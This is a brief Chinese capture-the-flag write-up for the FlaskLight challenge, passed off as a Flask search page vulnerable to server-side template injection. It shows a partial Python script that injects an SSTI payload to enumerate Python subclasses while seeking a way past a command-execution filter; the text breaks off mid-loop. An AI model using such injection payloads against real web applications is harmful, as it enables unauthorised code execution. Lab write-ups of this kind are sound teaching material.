[CSCCTF 2019 Qual]FlaskLight
get方法请求结合题目试试ssti
说明确实存在ssti
读取文件成功但是读不了app.py,命令执行也被禁止,看看大佬怎么bypass的
先写个脚本爆出可利用的类
import requests
import re
import html
import time
index = 0
for i in range(170, 1000):
try:
url = "http://aa86b4ee-a0a7-4634-8ef2-f4e80e7613ce.node3.buuoj.cn/?search={
{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
r = requests.get(url)
res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
time.sleep(0.1)